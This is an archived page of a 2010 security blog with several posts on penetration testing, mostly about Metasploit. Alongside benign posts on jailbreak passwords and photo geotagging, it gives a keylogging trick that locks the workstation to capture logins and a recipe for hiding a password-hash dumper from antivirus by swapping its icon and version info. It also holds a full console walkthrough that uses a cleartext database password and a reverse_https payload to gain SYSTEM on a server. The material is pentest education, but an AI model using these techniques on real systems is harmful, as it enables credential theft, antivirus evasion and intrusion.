Room362.com

Blatherings of a security addict.

Metasploit Turns 10,000

| Comments

Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or “commits” to a project. The Metasploit Framework hit 10,000 today.

With the project dating back to 2003, much before the official “Revision 1” happened, there have been a lot of changes. Going from the initial incarnation as a network “game” written in perl to the world largest ruby project, the framework has seen it’s fair share of blood, sweat, and tears. With Express out and Pro to come, there will definitely be 10,000 more.

Congratulations to the team, both past and present. What you guys do is extraordinary.

Jailbreak SSH Horrors Strike Back

| Comments

Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just wont stay down.

If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘mobile’ which has been pointed out since 2008 (here) on the iPhone as another account to change the password of. But the media and Cydia/Rock warnings only put emphasis on ‘root’.

Many iPad and iPhone apps STILL do not use the “keyring’” and store your password in plain text or somewhere in a binary file (still plaintext), which the user “mobile” has access to.

Ok, “so what” you say. Since this recent jailbreak was using a website, the individuals running that site now have the IP address of freshly jailbroken iPhones and iPads. I am certainly not saying that they have any ill intentions, but sites have been broken into before, and that would be one hell of a gold mine.

Hopefully AT&T has put in blocks of some sort so that it’s customers are protected, but who knows what the other countries around the world that carry iPhones are doing.

But at the very least, if you have jailbroken your iPhone, iPod Touch or iPad, please.. please set your passwords accordingly and do not have it a simple dictionary password.

Remember, you ARE giving up some security when you jail break your phone. It is on you to make sure that you lock what you can back down.

To change your password, use ‘Terminal’ and log in to one account at a time and issue the “passwd” command. You can also just log in to root and issue the “passwd mobile” command to change the password of mobile

Update on 2010-08-09 19:39 by Rob Fuller

I’ve gotten a lot of comments stating that OpenSSH isn’t installed by default and that this is not a big deal at all. A couple problems exist in that argument though:

  1. The Jailbreak is executing code on your phone/touch/ipad. Unless you do a analysis of the entire disk, you can’t be sure the jailbreak doesn’t leave some other way into the phone. Yes, that’s a far fetched chance, but most users would never know.

  2. Even if you don’t install it Out-of-the-box. There is a good possibility that you will OpenSSH at a later date. Better to get it fixed while you have it on the mind.

AV Tracker

| Comments

Ever set up a multi/handler and get an odd IP hitting it? Probably forgot about it as internet chatter? Think again, you might have just been caught

AV Tracker – http://avtracker.info/ is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other “Submit-your-malware-here” drop boxes use.

Peter Kleissner and his team provide

  • ranges that the hosts use
  • a dynamic text file with the IP addresses listed if you want to add it to some auto updating block list
  • a line by line IPTABLES block config
  • and even C code to add into your binary to make sure it doesn’t talk out from one of those addresses (I could be reading it wrong, still a beginner in C)

The team has been criticized a lot by AV vendors, enough so the took down the site in January of this year. But it came back June 5th.

I use this site to help me know when the Incident Responders are on to me for my pen testing jobs. I do not wish to get in the debate of how a tool could be used.

Resources for Railgun Development

| Comments

Metasploit’s Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:

  1. System Error Codes – This is hands down the best resource you have, it will tell you what that stupid “5” or “1314” means in your return value. Keep this tab open to circumvent crazed bovine attacks.

  2. theForger’s Win32 API Programming Tutorial – A really good place to start when you are getting to know the Windows API and the frustrations that come along with it. I highly recommend going through it first.

  3. MS Windows API Reference – Gigantic, and not the easiest to navigate, but really good for knowing what calls were added with each version of Windows as well as a basic (alphabetic) list of calls. Good if you know where you are going.

  4. The Undocumented Functions – Win NT/2k/XP/2k3 – A really old link but has good references to undocumented functions that have helped circumvent some of the stupidity of other more complicated functions.

  5. WineAPI Documentation – A great resource of API calls that mimic the Microsoft ones (Undocumented and Documented).

Hope this helps and I look forward to seeing what you come up with…

Intro to RailGun: WIN API for Meterpreter

| Comments

Back on June 13th, “Patrick HVE” released RAILGUN:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the the Metasploit trunk with 9709, 9710, 9711 and 9712: http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:

  • iphlpapi
  • ws2_32
  • kernel32
  • ntdll
  • user32
  • advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible, it doesn’t have a DLL or function you need? But you can read all about in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

  • net use – Shows you what Network drives are connected, but not physical ones
  • fsutil fsinfo drives – You must be an administrator to ride this train
  • fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But railgun solves this problem with a really short script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Load the Railgun plugin  **_Update: You no longer need this step_**  
# client.core.use("railgun")   
# Make the API call to enum drive letters   
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters        
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
  test = letters[i,1]
  rem = a % (2**(i+1))
  if rem > 0
      drives << test
      a = a - rem
  end
end
print_line("Drives Available = #{drives.inspect}")

Output: Drives Available = ["A", "C", "D", "P", "X"]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…

JEDI KEYLOGGING:

One of the problems with keylogging is you never know when that person will log in, and if you’re using a client side, they have probably already logged in and you’re hoping they log into a portal or some other password protected site.

Railgun to the rescue again:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon**   

meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*] winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize railgun and lockout the workstation, forcing the user to use their credentials again.**

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

client.core.use("railgun")
=> true
client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
exit
meterpreter >

Set up “tail -f” going on the log file for the keylogger and then kill the keylogger when you’ve gotten what you came for.

1
2
3
4
5
meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.

Set Wallpaper Meterpreter Script

| Comments

Certainly nothing to fuss over, but I’ve had a fascination with setting my target’s wallpaper as sort of a calling card for years now. I’ve been able to set the registry key (HKCUControl PanelDesktopWallpaper), but until recently I didn’t know how to get it to refresh so that it displayed without forcing the user to log out…

First, is the most important part, selection of the wallpaper. This is my first selection:

But, it has to be a BMP. So, I created:

metasploit_1024.bmp (2.3 MB)

next run:

1
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\metasploit_1024.bmp"

and finally the magic:

rundll32.exe user32.dll,UpdatePerUserSystemParameters

thats it, run that, and it’ll refresh the settings and display the wallpaper in all of it’s glory. But I wouldn’t be a metasploit dog if I didn’t make it into a meterpreter script:

download: wallpaper.rb

it’s definitely not ready to be in the trunk, but it works, just edit each of the options in the file to point at the bmp you want on the victim’s wallpaper and it’ll be there.

Todo:

  1. Make each parameter an option so there is no text editing involved
  2. Add the ability to convert other image types on the fly
  3. Figure out how to get the desktop color to refresh with the wallpaper

Get Off My Lawn! iPhone Geo Blocking

| Comments

I was recently approached by savant, who told me that a bunch of my Twitpics had geo location in them. Larry Pesce from PaulDotCom has been doing research in this field for a while and each time he brings it up I casually checked a couple of my twitpics and came up empty handed.

But, he gave me exact references, so I went to Twitpic to check them out for myself.

I was surprised to see that Twitpic actually has an option to show all the “Places I’ve Been”:

Hopeful, I clicked:

Sweet! All of my images are clean right?

But, like I said, the individual gave specific references of images. So, I pointed trusty “Jeffrey’s Exif Viewer” at one of the images that they told me about and:

sure enough, it had location data in it.

At a recent NoVA Hackers meetup there was a presentation on Geo forensics on mobile phones that was really enlightening, but very depressing for iPhone users like myself. For us, you can either have Location Services (GPS) on, or off. In other words, if you wanted to take a picture without geo information, you would have to open your settings, go into general, switch location services to off.. then when you wanted to use Google Maps to find something you’d have to turn it back on.

Complaints of a lazy person, I know, but remembering to check, and / or going through those steps each time I wanted to find a place or take a picture was a bit beyond my tolerance level.

iPhone OS 4.0 to the rescue: (calling it iOS 4 is just confusing re:cisco)

One of the coolest new features is app based control of geo information. So go to Settings –> General –> Location Services and turn Camera (and any other app you take photos with) OFF.

PS: You probably don’t need those pics sitting on Twitpic after your Tweet has come and gone. Might as well delete them. ;–) Sorry guys, I hope you have local copies.

AV Bypass Made Stupid

| Comments

WARNING if you use fgdump like I did, it extracts pwdump to %TEMP% at run time, which is detected by AV.

First of all, I was floored when this worked. Really AV? It’s that easy? Really?

So here is the break down, go get “Resource Hacker“… You’re almost done. Only 3 steps left. (1 of which is optional)

I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10. You see this on your AV report for your domain controller, and you’re having a bad day, probably week.

Watch this magic trick though:

[*] Step 1:

Open Res Hacker and drag a “normal” executable on to the window or Open File.

Click “Save All Resources”

Essentially what you are doing in this step is simply extracting the .ico file (Icon) from the executable. Now you can do this with other tools, but we’ll be using resource hacker in a minute again, so it’s just easy to do it all with one tool.

We are done with this executable unless you are doing Step 2, in that case, leave it open, open another Res Hacker window and open your ‘evil’. (In our case, fgdump.exe)

[*] Step 2 (Optional):

If you destination executable has tell-tale signs of it’s intent, much like fgdump as seen below:

You can simply copy and paste the version info from your ‘normal’ executable into your new one and hit “Compile Script”:

[*] Step 3:

Next we need to “Add a new Resource” (our icon) into our “evil” binary.

Once this prompt comes up, select the ICO file that shows the icon you want it to have (some binaries have a ton, so make sure it’s the right one). Put in ‘1’ for resource name, and ‘1033’ for your resource language. (You can play with these values, not sure what impact they have, but from the binaries I’ve looked at those values are pretty standard for a windows executable).

Save your new awesome binary as something else, I chose vlc2.exe

And… (drum roll)

Tada! Sad isn’t it? Only 1 of the top 10 AV now detect this binary. Good job AVG and Avast! You still picked it up, but Trend, Symantec, Microsoft, ClamAV, Kaspersky, Panda, Norman, NOD32, Sunbelt, F-Secure, Fortinet, BitDefender WTF guys!?

Oh and Kaspersky now flags it as “not-a-virus” but still flags it.

A Very Important Link…

| Comments

Normally I save links for my “Mubix Links” blog to keep the clutter down on this one, but I think this is one that I would like to highlight as important. The NFO, credits and summary to this copyrighted video is what I wish to highlight.

http://thepiratebay.org/torrent/5573874/Hackers_Wanted_%282008%29

I am against the misuse of copyrighted material, and it is a violation of laws in many countries, including my own.

I really wish this video would have been published, I’m sure it would have been a very interesting video, that I definitely would have purchased.

0Exploit Privilege Escalation

| Comments

The other day Chris Gates posted an excellent blog post about the WebDAV hotness that Chris Sullo (author of Nikto) cooked up (DAVTest) which Ryan Linn popped out a Metasploit module for.

Anyways, the story left off being a very limited user called “Network Service”. This user has Read and Execute, but no Write access, and a very limited field of view to boot.

1
2
meterpreter > getuid
Server username: **NT AUTHORITYNETWORK SERVICE**

Lets look around a bit..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
meterpreter > pwd

C:\Inetpub\wwwroot

meterpreter > ls

Listing: C:\Inetpub\wwwroot
===========================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
40777/rwxrwxrwx  0  dir  Fri May 07 09:32:19 -0400 2010  .
40777/rwxrwxrwx  0  dir  Mon May 03 12:51:48 -0400 2010  ..
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  admin
100666/rw-rw-rw-  1587  fil  Sat Dec 08 23:01:24 -0500 2001  default.asp
100666/rw-rw-rw-  1465  fil  Sat Dec 08 23:01:24 -0500 2001  default.css
100666/rw-rw-rw-  3295  fil  Thu Jan 03 12:40:48 -0500 2002  forgotpass.asp
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  images
40777/rwxrwxrwx  0  dir  Mon May 03 12:12:57 -0400 2010  language
100666/rw-rw-rw-  1802  fil  Thu Jan 24 12:10:04 -0500 2002  logoff.asp
100666/rw-rw-rw-  7785  fil  Sat Jun 15 19:49:20 -0400 2002  logon.asp
100666/rw-rw-rw-  1801  fil  Mon May 03 12:42:45 -0400 2010  settings.asp
100666/rw-rw-rw-  21137  fil  Wed Aug 28 11:31:42 -0400 2002  setup.asp

Sweet! a “settings.asp”

1
2
3
4
5
6
7
8
meterpreter > cat settings.asp

<SCRIPT LANGUAGE = "VBScript">
<(editorial snip)>
SQLUser = "sa"
SQLPass = "SuperDuper#@rdP@$$w0rd2012"
<(/editorial snip)>
</SCRIPT>

SA with clear text password. Good luck bruteforcing that one. But they block 1433 directly to the box so direct SQL queries are out. No problem.

Pivoting to the rescue:

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter >
Background session 1? [y/N] 

msf exploit(handler) > route add 192.168.56.0 255.255.255.0 1

msf exploit(handler) > route print

Active Routing Table
====================
Subnet  Netmask  Gateway
------  -------  -------
192.168.56.0  255.255.255.0  Session 1

Then we use mssql_login to check to see if our creds are right (set BLANK_PASSWORDS to false since we already know the password and we aren’t trying to brute force it). This will be routed through our meterpreter session that has NETWORK SERVICE permissions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf exploit(handler) > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false

msf auxiliary(mssql_login) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf auxiliary(mssql_login) > set RHOSTS 192.168.56.3
RHOSTS => 192.168.56.3

msf auxiliary(mssql_login) > run

[*] 192.168.56.3:1433 - MSSQL - Trying username:'sa' with password:'SuperDuper#@rdP@$$w0rd2012'

[+] 192.168.56.3:1433 - MSSQL - successful login 'sa' : 'SuperDuper#@rdP@$$w0rd2012'

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cool. Now some enumeration and check to see if xp_cmdshell is enabled (it outputs a lot of info so I cut it down to just the pieces we are looking for):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf exploit(mssql_login) > use admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf auxiliary(mssql_enum) > set RHOST 192.168.56.3
RHOST => 192.168.56.3

msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...

[*] Version:
[*] Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
[*] Aug  6 2000 00:57:48
[*] Copyright (c) 1988-2000 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

<(editorial snip)>

[*] xp_cmdshell is Enabled

<(/editorial snip)>

[*] Instances found on this server:
[*]  MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] LocalSystem
[*] Auxiliary module execution completed

XP_CMDSHELL and the server runs as local system. Looking good, payload time.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf auxiliary(mssql_enum) > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https

msf exploit(mssql_payload) > set LHOST 10.10.10.59
LHOST => 10.10.10.59

msf exploit(mssql_payload) > set RHOST 192.168.56.3
RHOST => 192.168.56.3

msf exploit(mssql_payload) > set LPORT 443
LPORT => 443

msf exploit(mssql_payload) > set PASSWORD SuperDuper#@rdP@$$w0rd2012
PASSWORD => SuperDuper#@rdP@$$w0rd2012

msf exploit(mssql_payload) > exploit

[*] HTTPS listener started on https://10.10.10.59:443/
[*] Command Stager progress - 2.78% done (1494/53675 bytes)
[*] Command Stager progress - 5.57% done (2988/53675 bytes)
[*] Command Stager progress - 8.35% done (4482/53675 bytes)

<(editorial snip)>

[*] Command Stager progress - 94.64% done (50796/53675 bytes)
[*] Command Stager progress - 97.32% done (52235/53675 bytes)
[*] 192.168.56.3:1061 Request received for /AvlbV...
[*] 192.168.56.3:1061 Staging connection for target vlbV received...
[*] Patching Target ID vlbV into DLL
[*] 192.168.56.3:1062 Request received for /BvlbV...
[*] 192.168.56.3:1062 Stage connection for target vlbV received...

[*] Meterpreter session 2 opened (10.10.10.59:443 -> 192.168.56.3:1062) at Thu May 06 22:03:50 -0400 2010

[*] Exploit completed, but no session was created.
msf exploit(mssql_payload) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Game over..

Note: Routing only sends the module(be it exploit or aux) through the session. Once the payload runs (for exploit modules), it’s is calling straight back to the LHOST (Attacker box), not through the session. So, in this example you can now exit session 1 (NETWORK SERVICE) as it’s not really needed any more.